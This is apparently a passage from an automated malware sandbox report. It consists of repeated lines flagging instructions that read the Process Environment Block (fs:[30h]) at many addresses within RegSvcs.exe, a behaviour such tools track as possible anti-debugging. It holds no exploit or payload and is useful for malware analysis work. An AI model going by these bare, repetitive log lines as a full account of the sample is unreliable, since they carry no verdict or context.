                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163678E mov eax, dword ptr fs:[00000030h]8_2_0163678E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015907AF mov eax, dword ptr fs:[00000030h]8_2_015907AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165866E mov eax, dword ptr fs:[00000030h]8_2_0165866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165866E mov eax, dword ptr fs:[00000030h]8_2_0165866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AC640 mov eax, dword ptr fs:[00000030h]8_2_015AC640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C2674 mov eax, dword ptr fs:[00000030h]8_2_015C2674
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA660 mov eax, dword ptr fs:[00000030h]8_2_015CA660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA660 mov eax, dword ptr fs:[00000030h]8_2_015CA660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D2619 mov eax, dword ptr fs:[00000030h]8_2_015D2619
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A260B mov eax, dword ptr fs:[00000030h]8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A260B mov eax, dword ptr fs:[00000030h]8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A260B mov eax, dword ptr fs:[00000030h]8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A260B mov eax, dword ptr fs:[00000030h]8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A260B mov eax, dword ptr fs:[00000030h]8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A260B mov eax, dword ptr fs:[00000030h]8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A260B mov eax, dword ptr fs:[00000030h]8_2_015A260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E609 mov eax, dword ptr fs:[00000030h]8_2_0160E609
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159262C mov eax, dword ptr fs:[00000030h]8_2_0159262C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C6620 mov eax, dword ptr fs:[00000030h]8_2_015C6620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C8620 mov eax, dword ptr fs:[00000030h]8_2_015C8620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE627 mov eax, dword ptr fs:[00000030h]8_2_015AE627
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016106F1 mov eax, dword ptr fs:[00000030h]8_2_016106F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016106F1 mov eax, dword ptr fs:[00000030h]8_2_016106F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E6F2 mov eax, dword ptr fs:[00000030h]8_2_0160E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E6F2 mov eax, dword ptr fs:[00000030h]8_2_0160E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E6F2 mov eax, dword ptr fs:[00000030h]8_2_0160E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E6F2 mov eax, dword ptr fs:[00000030h]8_2_0160E6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA6C7 mov ebx, dword ptr fs:[00000030h]8_2_015CA6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA6C7 mov eax, dword ptr fs:[00000030h]8_2_015CA6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01594690 mov eax, dword ptr fs:[00000030h]8_2_01594690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01594690 mov eax, dword ptr fs:[00000030h]8_2_01594690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C66B0 mov eax, dword ptr fs:[00000030h]8_2_015C66B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CC6A6 mov eax, dword ptr fs:[00000030h]8_2_015CC6A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01634978 mov eax, dword ptr fs:[00000030h]8_2_01634978
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01634978 mov eax, dword ptr fs:[00000030h]8_2_01634978
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161C97C mov eax, dword ptr fs:[00000030h]8_2_0161C97C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664940 mov eax, dword ptr fs:[00000030h]8_2_01664940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01610946 mov eax, dword ptr fs:[00000030h]8_2_01610946
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D096E mov eax, dword ptr fs:[00000030h]8_2_015D096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D096E mov edx, dword ptr fs:[00000030h]8_2_015D096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015D096E mov eax, dword ptr fs:[00000030h]8_2_015D096E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B6962 mov eax, dword ptr fs:[00000030h]8_2_015B6962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B6962 mov eax, dword ptr fs:[00000030h]8_2_015B6962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B6962 mov eax, dword ptr fs:[00000030h]8_2_015B6962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01588918 mov eax, dword ptr fs:[00000030h]8_2_01588918
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01588918 mov eax, dword ptr fs:[00000030h]8_2_01588918
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0162892B mov eax, dword ptr fs:[00000030h]8_2_0162892B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161892A mov eax, dword ptr fs:[00000030h]8_2_0161892A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E908 mov eax, dword ptr fs:[00000030h]8_2_0160E908
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160E908 mov eax, dword ptr fs:[00000030h]8_2_0160E908
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161C912 mov eax, dword ptr fs:[00000030h]8_2_0161C912
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161E9E0 mov eax, dword ptr fs:[00000030h]8_2_0161E9E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h]8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h]8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h]8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h]8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h]8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A9D0 mov eax, dword ptr fs:[00000030h]8_2_0159A9D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C49D0 mov eax, dword ptr fs:[00000030h]8_2_015C49D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016269C0 mov eax, dword ptr fs:[00000030h]8_2_016269C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C29F9 mov eax, dword ptr fs:[00000030h]8_2_015C29F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C29F9 mov eax, dword ptr fs:[00000030h]8_2_015C29F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165A9D3 mov eax, dword ptr fs:[00000030h]8_2_0165A9D3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016189B3 mov esi, dword ptr fs:[00000030h]8_2_016189B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016189B3 mov eax, dword ptr fs:[00000030h]8_2_016189B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016189B3 mov eax, dword ptr fs:[00000030h]8_2_016189B3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015909AD mov eax, dword ptr fs:[00000030h]8_2_015909AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015909AD mov eax, dword ptr fs:[00000030h]8_2_015909AD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A29A0 mov eax, dword ptr fs:[00000030h]8_2_015A29A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01594859 mov eax, dword ptr fs:[00000030h]8_2_01594859
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01594859 mov eax, dword ptr fs:[00000030h]8_2_01594859
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C0854 mov eax, dword ptr fs:[00000030h]8_2_015C0854
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01626870 mov eax, dword ptr fs:[00000030h]8_2_01626870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01626870 mov eax, dword ptr fs:[00000030h]8_2_01626870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161E872 mov eax, dword ptr fs:[00000030h]8_2_0161E872
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161E872 mov eax, dword ptr fs:[00000030h]8_2_0161E872
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A2840 mov ecx, dword ptr fs:[00000030h]8_2_015A2840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163483A mov eax, dword ptr fs:[00000030h]8_2_0163483A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163483A mov eax, dword ptr fs:[00000030h]8_2_0163483A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA830 mov eax, dword ptr fs:[00000030h]8_2_015CA830
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B2835 mov eax, dword ptr fs:[00000030h]8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B2835 mov eax, dword ptr fs:[00000030h]8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B2835 mov eax, dword ptr fs:[00000030h]8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B2835 mov ecx, dword ptr fs:[00000030h]8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B2835 mov eax, dword ptr fs:[00000030h]8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B2835 mov eax, dword ptr fs:[00000030h]8_2_015B2835
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161C810 mov eax, dword ptr fs:[00000030h]8_2_0161C810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165A8E4 mov eax, dword ptr fs:[00000030h]8_2_0165A8E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BE8C0 mov eax, dword ptr fs:[00000030h]8_2_015BE8C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CC8F9 mov eax, dword ptr fs:[00000030h]8_2_015CC8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CC8F9 mov eax, dword ptr fs:[00000030h]8_2_015CC8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016608C0 mov eax, dword ptr fs:[00000030h]8_2_016608C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01590887 mov eax, dword ptr fs:[00000030h]8_2_01590887
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161C89D mov eax, dword ptr fs:[00000030h]8_2_0161C89D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01588B50 mov eax, dword ptr fs:[00000030h]8_2_01588B50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01638B42 mov eax, dword ptr fs:[00000030h]8_2_01638B42
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01626B40 mov eax, dword ptr fs:[00000030h]8_2_01626B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01626B40 mov eax, dword ptr fs:[00000030h]8_2_01626B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165AB40 mov eax, dword ptr fs:[00000030h]8_2_0165AB40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158CB7E mov eax, dword ptr fs:[00000030h]8_2_0158CB7E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01644B4B mov eax, dword ptr fs:[00000030h]8_2_01644B4B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01644B4B mov eax, dword ptr fs:[00000030h]8_2_01644B4B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01662B57 mov eax, dword ptr fs:[00000030h]8_2_01662B57
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01662B57 mov eax, dword ptr fs:[00000030h]8_2_01662B57
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01662B57 mov eax, dword ptr fs:[00000030h]8_2_01662B57
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01662B57 mov eax, dword ptr fs:[00000030h]8_2_01662B57
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163EB50 mov eax, dword ptr fs:[00000030h]8_2_0163EB50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01658B28 mov eax, dword ptr fs:[00000030h]8_2_01658B28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01658B28 mov eax, dword ptr fs:[00000030h]8_2_01658B28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664B00 mov eax, dword ptr fs:[00000030h]8_2_01664B00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BEB20 mov eax, dword ptr fs:[00000030h]8_2_015BEB20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BEB20 mov eax, dword ptr fs:[00000030h]8_2_015BEB20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h]8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h]8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h]8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h]8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h]8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h]8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h]8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h]8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160EB1D mov eax, dword ptr fs:[00000030h]8_2_0160EB1D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B0BCB mov eax, dword ptr fs:[00000030h]8_2_015B0BCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B0BCB mov eax, dword ptr fs:[00000030h]8_2_015B0BCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B0BCB mov eax, dword ptr fs:[00000030h]8_2_015B0BCB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161CBF0 mov eax, dword ptr fs:[00000030h]8_2_0161CBF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01590BCD mov eax, dword ptr fs:[00000030h]8_2_01590BCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01590BCD mov eax, dword ptr fs:[00000030h]8_2_01590BCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01590BCD mov eax, dword ptr fs:[00000030h]8_2_01590BCD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BEBFC mov eax, dword ptr fs:[00000030h]8_2_015BEBFC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01598BF0 mov eax, dword ptr fs:[00000030h]8_2_01598BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01598BF0 mov eax, dword ptr fs:[00000030h]8_2_01598BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01598BF0 mov eax, dword ptr fs:[00000030h]8_2_01598BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163EBD0 mov eax, dword ptr fs:[00000030h]8_2_0163EBD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01644BB0 mov eax, dword ptr fs:[00000030h]8_2_01644BB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01644BB0 mov eax, dword ptr fs:[00000030h]8_2_01644BB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0BBE mov eax, dword ptr fs:[00000030h]8_2_015A0BBE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0BBE mov eax, dword ptr fs:[00000030h]8_2_015A0BBE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0A5B mov eax, dword ptr fs:[00000030h]8_2_015A0A5B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A0A5B mov eax, dword ptr fs:[00000030h]8_2_015A0A5B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163EA60 mov eax, dword ptr fs:[00000030h]8_2_0163EA60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h]8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h]8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h]8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h]8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h]8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h]8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596A50 mov eax, dword ptr fs:[00000030h]8_2_01596A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160CA72 mov eax, dword ptr fs:[00000030h]8_2_0160CA72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0160CA72 mov eax, dword ptr fs:[00000030h]8_2_0160CA72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CCA6F mov eax, dword ptr fs:[00000030h]8_2_015CCA6F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CCA6F mov eax, dword ptr fs:[00000030h]8_2_015CCA6F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CCA6F mov eax, dword ptr fs:[00000030h]8_2_015CCA6F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B4A35 mov eax, dword ptr fs:[00000030h]8_2_015B4A35
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B4A35 mov eax, dword ptr fs:[00000030h]8_2_015B4A35
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161CA11 mov eax, dword ptr fs:[00000030h]8_2_0161CA11
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015BEA2E mov eax, dword ptr fs:[00000030h]8_2_015BEA2E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CCA24 mov eax, dword ptr fs:[00000030h]8_2_015CCA24
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01590AD0 mov eax, dword ptr fs:[00000030h]8_2_01590AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C4AD0 mov eax, dword ptr fs:[00000030h]8_2_015C4AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C4AD0 mov eax, dword ptr fs:[00000030h]8_2_015C4AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015E6ACC mov eax, dword ptr fs:[00000030h]8_2_015E6ACC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015E6ACC mov eax, dword ptr fs:[00000030h]8_2_015E6ACC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015E6ACC mov eax, dword ptr fs:[00000030h]8_2_015E6ACC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CAAEE mov eax, dword ptr fs:[00000030h]8_2_015CAAEE
